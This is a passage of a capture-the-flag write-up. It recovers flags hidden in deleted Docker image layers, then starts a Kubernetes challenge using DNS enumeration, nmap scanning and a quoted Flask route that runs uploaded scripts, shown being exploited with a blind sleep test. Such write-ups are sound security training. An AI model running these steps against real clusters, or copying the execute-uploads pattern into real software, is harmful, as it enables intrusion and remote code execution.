<missing> 5 weeks ago RUN /bin/sh -c rm -rf /tmp/*, /cache/*, /var/cache/apk/*, var/lib/db/sbom/* # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c rm /deep/hide/flag.txt # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag2.txt /deep/hide/flag.txt # buildkit 61B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c mkdir -p /deep/hide # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY rootfs / # buildkit 15.7MB buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c rm /.wh.flag.txt # buildkit 0B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY falseflag1.txt /.wh.flag.txt # buildkit 33B buildkit.dockerfile.v0
<missing> 5 weeks ago COPY rootfs / # buildkit 15.7MB buildkit.dockerfile.v0
Interesting. Multiple fake flags. There is probably a real flag amongst them. I also note they're deleting files within later layers (the .wh. prefix is a nod to the whiteout files OCI layers use to mark a lower-layer file as deleted). So we will want to find the files in the intermediate layers.
What I tend to do in these cases is just extract all the layers: enumerate all the blob tar files within the image and extract them all, and then find can be used to locate what we need.
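Something like the following loop would do it in one pass (a rough sketch; layers/ is just an arbitrary output directory), though below I did it more manually with file, mv, and atool:
cd blobs/sha256
for blob in *; do
  if file "$blob" | grep -q 'tar archive'; then
    mkdir -p "../../layers/$blob" && tar -xf "$blob" -C "../../layers/$blob"
  fi
done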
╭─user@blackarch /tmp/shell-in-the-ghost/blobs/sha256
╰─$ ls
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984 760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19 d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b 88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306 e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92 8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924 e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc 8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00 e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8 92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317 eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056 99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7 f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01 d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3
$ file *
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984: POSIX tar archive
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b: JSON text data
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92: POSIX tar archive
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc: JSON text data
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8: POSIX tar archive
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056: POSIX tar archive
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f: JSON text data
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01: JSON text data
760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19: JSON text data
88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306: JSON text data
8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924: POSIX tar archive
8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00: JSON text data
92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317: POSIX tar archive
99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7: JSON text data
c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5: JSON text data
d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3: POSIX tar archive
d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5: JSON text data
e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d: JSON text data
e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd: POSIX tar archive
e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675: JSON text data
eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e: POSIX tar archive
f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17: POSIX tar archive
$ file * | grep tar | cut -d : -f 1 | xargs -I {} mv {}{,.tar}
$ ls
1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984.tar 760b2d2a3e4316725ca6053138012395007fc5878c8fe2e72cedb4ed3f5c3e19 d2465102e980303d11a5e2de47e2e26e93d5fec4a2ae0c52f6b3dcaae9a6b3a5
42ec1fd1e0e9cf7c66eeafd4af20102a74bd604f394e4436ab4362e55a067c9b 88302c9a41e733f7831e7021452a4af6e10cb20261b62d0f94d01b534144a306 e020a1a182f2ce3e5dceaef2e289252d90182183c0da7429c168da076fce2b1d
5376b25e3f75a3421b07ea7ce71b6fc3175a6291efe6ee503b30deb3858dee92.tar 8a04e1e4e352a5143946c723aad4504b588f1b39e41901fdc552423ac8b48924.tar e87db9805fd4530ac25ce61d892cd44fce1d5a593e7ff11c94cdf1288b5882bd.tar
59a0df766dc22d514f5c5078bad37f4faa2ea33970b360dc7ed5f495103c54fc 8f2cd3c7d6304f9a8ca41a48b5eeb27fc9cf4e5edaba5c8ec06998c045994f00 e9f96e6e28efc8a2eca17fedab984eab7d024ffdad3aa77c868df575ca112675
5db8e41a8498638fbc3bf763abb7983cccaf980d9657e0db957ed0eace3989a8.tar 92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317.tar eb8f5cc21405068b9b719d5b886d66d5215a7225bd6645ae8a749926320d676e.tar
601ba503a6dbaf012992587a01dfdd39b13e7c0887e9d0f3ec4ddc6847939056.tar 99e29511b54555986db28630e40ef2420d4fb66ffcf1335dd6d6b958070b99f7 f01e729dc70063324a0287a046d98605685aec78421c0b98f6ad231b3d05bd17.tar
65add838b59ff8eea90e22069f2509468eb28de81336faaf87a7bf6616543f8f c4563828e88b8b72b3bd50b2d003e692179a59e236942272ed8146b896af5fb5
6c3770d4479810e0c121b23f00473facabdb223ebc911562c2d5208625d94e01 d0d76947a71ac5bfc7014cdc218e4585ef6dd38d55e3588f0d216ad4995097e3.tar
$ ls *.tar | xargs -n 1 atool -x
.dockerenv
bin
dev/
dev/console
[..SNIP..]
Now, that's all the tarballs extracted. Let's start finding things. We can start with the fake flags, because why not.
The first fake flag was saved as .wh.flag.txt
$ find . -name .wh.flag.txt -exec cat {} \; | base64 -d
CTF{sorry_this_isnt_it}
Second was in flag.txt.
$ find . -name flag.txt -exec cat {} \; | base64 -d
CTF{sorry_you_didnt_find_me_but_your_closer}
The final one was .wh.hidden.txt
$ find . -name .wh.hidden.txt -exec cat {} \; | base64 -d
CTF{sorry_Just_another_ghost_dontgiveup}
Now, thinking about where the actual flag could be: in the Dockerfile there was one other set of deletions, the directories (rm -rf /tmp/*, /cache/*, /var/cache/apk/*, var/lib/db/sbom/*). The real flag is probably in there somewhere.
Let's use find again to see what files could match those.
$ find . -type f | grep tmp
$ find . -type f | grep cache
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/etc/ld.so.cache
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/etc/ld.so.cache
$ find . -type f | grep sbom
./var/lib/db/sbom/.wh.zsh-5.9r7.spdx.json
./var/lib/db/sbom/.wh.zlib-1.3.1-r50.spdx.json
./var/lib/db/sbom/.wh.wolfi-keys-1-r11.spdx.json
./var/lib/db/sbom/.wh.wolfi-baselayout-20230201-r21.spdx.json
./var/lib/db/sbom/.wh.wolfi-base-1-r7.spdx.json
./var/lib/db/sbom/.wh.libxcrypt-4.4.38-r2.spdx.json
./var/lib/db/sbom/.wh.libssl3-3.5.1-r0.spdx.json
./var/lib/db/sbom/.wh.libgcc-15.1.0-r1.spdx.json
./var/lib/db/sbom/.wh.libcrypto3-3.5.1-r0.spdx.json
./var/lib/db/sbom/.wh.libcrypt1-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.ld-linux-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.glibc-locale-posix-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.glibc-2.41-r53.spdx.json
./var/lib/db/sbom/.wh.ca-certificates-bundle-20241121-r42.spdx.json
./var/lib/db/sbom/.wh.busybox-1.37.0-r46.spdx.json
./var/lib/db/sbom/.wh.apk-tools-2.14.10-r5.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/zsh-5.9r7.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/zlib-1.3.1-r50.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-keys-1-r11.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-baselayout-20230201-r21.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/wolfi-base-1-r7.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libxcrypt-4.4.38-r2.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libssl3-3.5.1-r0.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libgcc-15.1.0-r1.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libcrypto3-3.5.1-r0.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/libcrypt1-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/ld-linux-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/glibc-locale-posix-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/glibc-2.41-r53.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/ca-certificates-bundle-20241121-r42.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/busybox-1.37.0-r46.spdx.json
./92510d4152ebb5b036a6da0f50ce0bd4e2151097c964190ccb8bf599bdd4b317/var/lib/db/sbom/apk-tools-2.14.10-r5.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/zsh-5.9r7.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/zlib-1.3.1-r50.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-keys-1-r11.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-baselayout-20230201-r21.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/wolfi-base-1-r7.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libxcrypt-4.4.38-r2.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libssl3-3.5.1-r0.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libgcc-15.1.0-r1.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libcrypto3-3.5.1-r0.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/libcrypt1-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/ld-linux-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/glibc-locale-posix-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/glibc-2.41-r53.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/ca-certificates-bundle-20241121-r42.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/busybox-1.37.0-r46.spdx.json
./1ef464d59b39bbb9e098db47994e8e8b2fb8157bf8229f925f43533ae2aa8984/var/lib/db/sbom/apk-tools-2.14.10-r5.spdx.json
Let's start with the SBOMs; it's probably easier to hide a flag within some JSON files than in ld.so.cache.
$ ls -lp
total 64
-rw-r--r-- 1 user user 3593 Jul 2 14:52 apk-tools-2.14.10-r5.spdx.json
-rw-r--r-- 1 user user 3132 Jun 17 14:28 busybox-1.37.0-r46.spdx.json
-rw-r--r-- 1 user user 3397 May 28 14:35 ca-certificates-bundle-20241121-r42.spdx.json
-rw-r--r-- 1 user user 3455 Jul 2 17:06 glibc-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3546 Jul 2 17:06 glibc-locale-posix-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3476 Jul 2 17:06 ld-linux-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3483 Jul 2 17:06 libcrypt1-2.41-r53.spdx.json
-rw-r--r-- 1 user user 3390 Jul 2 17:17 libcrypto3-3.5.1-r0.spdx.json
-rw-r--r-- 1 user user 3308 Jun 2 18:31 libgcc-15.1.0-r1.spdx.json
-rw-r--r-- 1 user user 3369 Jul 2 17:17 libssl3-3.5.1-r0.spdx.json
-rw-r--r-- 1 user user 3091 May 28 14:35 libxcrypt-4.4.38-r2.spdx.json
-rw-r--r-- 1 user user 2037 Feb 11 20:06 wolfi-base-1-r7.spdx.json
-rw-r--r-- 1 user user 2153 Jun 23 14:08 wolfi-baselayout-20230201-r21.spdx.json
-rw-r--r-- 1 user user 2050 May 28 14:35 wolfi-keys-1-r11.spdx.json
-rw-r--r-- 1 user user 2958 Jun 23 14:34 zlib-1.3.1-r50.spdx.json
-rw-r--r-- 1 user user 83 Jul 5 21:36 zsh-5.9r7.spdx.json
The first thing I notice is that the zsh-5.9r7.spdx.json file is considerably smaller than the rest.
$ cat zsh-5.9r7.spdx.json
{"SHA256": "U3poVFExUkdlM2RvYVhSbGIzVjBjeTFqWVc1MExYTjBiM0F0YldVdFltRmllWDBLCg=="}
$ base64 -d <<< U3poVFExUkdlM2RvYVhSbGIzVjBjeTFqWVc1MExYTjBiM0F0YldVdFltRmllWDBLCg== | base64 -d
K8SCTF{whiteouts-cant-stop-me-baby}
This one did take a while to get accepted in CTFd, but eventually we got there after a ping to the organisers :D
Challenge 5 - terminate-transfer by Adam Crompton (@3nc0d3r)
Needed a fileshare to share c@r$ with friends. If your a real friend you will know how to enter my c@r$....
Start by exec-ing into the entry-pod pod in the terminate-transfer namespace. Connect to the entry service in the sidecar namespace.
Attached you find a python script that runs inside the cluster.
cyl0ck
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
pods/exec [] [] [create]
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, let's start off once again in entry-pod.
$ k get pods
NAME READY STATUS RESTARTS AGE
entry-pod 1/1 Running 0 53s
$ k exec -it entry-pod -- bash
root@entry-pod:/#
We also know where to go next.
root@entry-pod:/tmp# curl -v entry.sidecar
* Could not resolve host: entry.sidecar
* Closing connection 0
curl: (6) Could not resolve host: entry.sidecar
Huh… interesting.
OK, let’s enumerate and try to find it. I assume there is a service somewhere. Using coredns-enum we can start quickly enumerating the cluster via DNS.
root@entry-pod:/tmp# ./coredns-enum
12:46AM INF Detected nameserver as 10.128.0.10:53
12:46AM INF Falling back to bruteforce mode
12:46AM INF Guessed [10.128.0.0/22 172.18.0.0/22 172.18.0.0/22] CIDRs from APIserver cert
12:46AM INF Scanning range 10.128.0.0 to 10.128.3.255, 1024 hosts
12:46AM INF Scanning range 172.18.0.0 to 172.18.3.255, 1024 hosts
12:46AM INF Scanning range 172.18.0.0 to 172.18.3.255, 1024 hosts
+-------------+------------------------------------+-------------+--------------------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-------------+------------------------------------+-------------+--------------------+-----------+
| default | kubernetes | 172.18.0.14 | 443/tcp (https) | |
| | | 10.128.0.1 | 443/tcp (https) | |
| | | 172.18.0.14 | 443/tcp (https) | |
| kind | clusterapi-on-demand-control-plane | 172.18.0.6 | ?? | |
| | | | ?? | |
| | ctfd-13-5kczc-sgxdw | 172.18.0.23 | ?? | |
| | | | ?? | |
| | ctfd-13-lb | 172.18.0.22 | ?? | |
| | | | ?? | |
| | ctfd-13-md-0-4r28s-294h9-d6mdj | 172.18.0.24 | ?? | |
| | | | ?? | |
| | ctfd-14-lb | 172.18.0.19 | ?? | |
| | | | ?? | |
| | ctfd-14-ln4c6-ntdjs | 172.18.0.20 | ?? | |
| | | | ?? | |
| | ctfd-14-md-0-74wbv-qp4f8-2w6sd | 172.18.0.21 | ?? | |
| | | | ?? | |
| | ctfd-17-2fjk8-n8v75 | 172.18.0.8 | ?? | |
| | | | ?? | |
| | ctfd-17-lb | 172.18.0.7 | ?? | |
| | | | ?? | |
| | ctfd-17-md-0-ndlj5-gclxn-5d96m | 172.18.0.27 | ?? | |
| | | | ?? | |
| | ctfd-20-62wrp-nbglg | 172.18.0.17 | ?? | |
| | | | ?? | |
| | ctfd-20-lb | 172.18.0.16 | ?? | |
| | | | ?? | |
| | ctfd-20-md-0-cw77r-9nmzz-pcb4c | 172.18.0.18 | ?? | |
| | | | ?? | |
| | ctfd-21-lb | 172.18.0.9 | ?? | |
| | | | ?? | |
| | ctfd-21-md-0-c6tc8-8k5mh-llh2p | 172.18.0.26 | ?? | |
| | | | ?? | |
| | ctfd-21-vjnwg-bj8lx | 172.18.0.25 | ?? | |
| | | | ?? | |
| | ctfd-23-hlcx4-h58kw | 172.18.0.29 | ?? | |
| | | | ?? | |
| | ctfd-23-lb | 172.18.0.28 | ?? | |
| | | | ?? | |
| | ctfd-23-md-0-7jns2-crmfn-d4b8d | 172.18.0.30 | ?? | |
| | | | ?? | |
| | ctfd-34-lb | 172.18.0.10 | ?? | |
| | | | ?? | |
| | ctfd-34-md-0-nnc2d-w8gd9-hxvr9 | 172.18.0.12 | ?? | |
| | | | ?? | |
| | ctfd-34-trlld-tzt2d | 172.18.0.11 | ?? | |
| | | | ?? | |
| | ctfd-35-lb | 172.18.0.13 | ?? | |
| | | | ?? | |
| | ctfd-35-md-0-7qn5b-qcpd7-4njd6 | 172.18.0.15 | ?? | |
| | | | ?? | |
| | kond-registry-docker-1 | 172.18.0.3 | ?? | |
| | | | ?? | |
| | kond-registry-gcr-1 | 172.18.0.4 | ?? | |
| | | | ?? | |
| | kond-registry-k8s-1 | 172.18.0.5 | ?? | |
| | | | ?? | |
| | kond-registry-quay-1 | 172.18.0.2 | ?? | |
| | | | ?? | |
| kube-system | kube-dns | 10.128.0.10 | 53/udp (dns) | |
| | | | 53/tcp (dns-tcp) | |
| | | | 9153/tcp (metrics) | |
+-------------+------------------------------------+-------------+--------------------+-----------+
Hmm… nada.
Further information eventually led me to enumerate a fixed CIDR range based off the pod's IP.
root@entry-pod:/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: tunl0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
3: eth0@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
link/ether 4e:36:7d:5f:39:d6 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.134.65/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::4c36:7dff:fe5f:39d6/64 scope link
valid_lft forever preferred_lft forever
root@entry-pod:/tmp# ./coredns-enum --cidr 192.168.134.65/24
12:48AM INF Detected nameserver as 10.128.0.10:53
12:48AM INF Falling back to bruteforce mode
12:48AM INF Scanning range 192.168.134.0 to 192.168.134.255, 256 hosts
+-----------+-------+----------------+----------+-----------+
| NAMESPACE | NAME | SVC IP | SVC PORT | ENDPOINTS |
+-----------+-------+----------------+----------+-----------+
| sidecars | entry | 192.168.134.66 | ?? | |
+-----------+-------+----------------+----------+-----------+
There it is. sidecars is plural, I see. We don't know which port is open yet, so let's scan it.
root@entry-pod:/tmp# nmap -p- -T5 entry.sidecars -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-10 00:50 UTC
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.35% done; ETC: 01:47 (0:56:00 remaining)
root@entry-pod:/tmp# nmap --top-ports 1000 -T5 entry.sidecars -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2025-08-10 00:51 UTC
Nmap scan report for entry.sidecars (10.135.154.248)
Host is up (0.00010s latency).
rDNS record for 10.135.154.248: entry.sidecars.svc.cluster.local
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE
8087/tcp open simplifymedia
Nmap done: 1 IP address (1 host up) scanned in 25.56 seconds
Nice, now curl.
root@entry-pod:/tmp# curl entry.sidecars:8087
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>cylc0k Upload File!!!</title>
<link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet">
<style>
body {
font-family: 'Inter', sans-serif;
background-color: #000000;
color: #FF1D8E;
}
.container {
max-width: 800px;
margin: 40px auto;
padding: 30px;
background-color: #000000;
border-radius: 12px;
box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
opacity: .8;
}
.btn {
@apply px-5 py-2 rounded-lg font-semibold transition duration-200;
}
.btn-primary {
@apply bg-blue-600 text-black hover:bg-blue-700;
}
.btn-secondary {
@apply bg-pink-200 text-pink-800 hover:bg-pink-300;
}
.btn-danger {
@apply bg-red-500 text-black hover:bg-red-600;
}
.file-item {
@apply flex justify-between items-center bg-pink-50 p-3 rounded-lg mb-2;
}
</style>
</head>
<body style="background-image: url('static/images/IMG_4239.jpeg"'); background-repeat: no-repeat; background-size: cover; background-attachment: scroll;">
<div class="container"><pre>
<center>
.__ _______ __
____ ___.__.| | \ _ \ ____ | | __
_/ ___< | || | / /_\ \_/ ___\| |/ /
\ \___\___ || |_\ \_/ \ \___| <
\___ > ____||____/\_____ /\___ >__|_ \
\/\/ \/ \/ \/
[Upload File]</center></pre>
<div class="bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700 p-4 rounded-lg mb-8" role="alert">
<p class="font-bold">Upload File</p>
<p>Upload specific types of files :)</p>
</div>
<h2 class="text-2xl font-semibold mb-4 text-pink-700">Upload a File</h2>
<form method="POST" action="/upload" enctype="multipart/form-data" class="mb-8 p-6 border border-pink-700 rounded-lg bg-black-700">
<div class="mb-4">
<label for="file" class="block text-pink-700 text-sm font-bold mb-2">Choose File:</label>
<input type="file" name="file" id="file" class="block w-full text-sm text-pink-900 bg-black-700 rounded-lg border border-pink-800 cursor-pointer focus:outline-none focus:border-blue-500 p-2.5">
</div>
<button type="submit" class="btn btn-primary w-full">Upload File</button>
</form>
<h2 class="text-2xl font-semibold mb-4 text-pink-700">Uploaded Files</h2>
<p class="text-pink-600 text-center py-4 border border-dashed border-pink-300 rounded-lg">No files uploaded yet.</p>
</div>
</body>
</html>
Interesting, this looks to have upload functionality.
At this stage, the upload.py mentioned in the description hadn't yet been shared with us, so I spent quite a while experimenting with the application trying to find a way in, with no luck. Eventually, the organisers uploaded the Python code, which included the following snippet:
@app.route('/execute/<filename>')
def execute_file(filename):
    """
    Executes specific types of uploaded files and returns their output.
    """
    file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
    execution_output = ""

    # Ensure the file exists before attempting to execute
    if not os.path.exists(file_path):
        return f"Error: File '{filename}' not found."

    # Determine execution method based on file extension
    if filename.endswith('.cyl0ck'):
        try:
            # Execute Python script
            result = subprocess.run(['python3', file_path], capture_output=True, text=True, check=True)
            execution_output = f"<h3>Output of {filename}:</h3><pre>{result.stdout}</pre>"
            if result.stderr:
                execution_output += f"<h3>Errors (if any):</h3><pre style='color: red;'>{result.stderr}</pre>"
        except subprocess.CalledProcessError as e:
            execution_output = f"<h3>Error executing Python script {filename}:</h3><pre style='color: red;'>{e.stderr}</pre>"
        except Exception as e:
            execution_output = f"<h3>Unexpected error:</h3><pre style='color: red;'>{e}</pre>"
    elif filename.endswith('.sh'):
        try:
            # Execute Shell script
            # Make the script executable first
            os.chmod(file_path, 0o755)  # Add execute permissions
            result = subprocess.run([file_path], capture_output=True, text=True, check=True)
            execution_output = f"<h3>Output of {filename}:</h3><pre>{result.stdout}</pre>"
            if result.stderr:
                execution_output += f"<h3>Errors (if any):</h3><pre style='color: red;'>{result.stderr}</pre>"
        except subprocess.CalledProcessError as e:
            execution_output = f"<h3>Error executing Shell script {filename}:</h3><pre style='color: red;'>{e.stderr}</pre>"
        except Exception as e:
            execution_output = f"<h3>Unexpected error:</h3><pre style='color: red;'>{e}</pre>"
    else:
        execution_output = f"<h3>Execution not supported for file type: {filename}</h3>"
        execution_output += f"<p>You can <a href='{url_for('uploaded_file', filename=filename)}'>view the file</a> instead.</p>"

    # Render a simple page to display the output
    return render_template('execution_output.html', filename=filename, output=execution_output)
Ooh, it can execute uploaded files. One of the files I had uploaded was a sh script, so let's try executing that.
root@entry-pod:/tmp# curl entry.sidecars:8087/execute/test.sh
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
OK… let's try the cyl0ck files.
root@entry-pod:/tmp# cat test.cyl0ck
print(1)
root@entry-pod:/tmp# curl entry.sidecars:8087/upload -F "file=@test.cyl0ck"
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/">/</a>. If not, click the link.
root@entry-pod:/tmp# curl entry.sidecars:8087/execute/test.cyl0ck
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
Hmm… Trying it again with an import time; time.sleep(10) payload did produce a noticeable delay in the response, suggesting the code was actually executing; I just couldn't see the output.
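That blind test looked roughly like this (sleep.cyl0ck is just an arbitrary filename):
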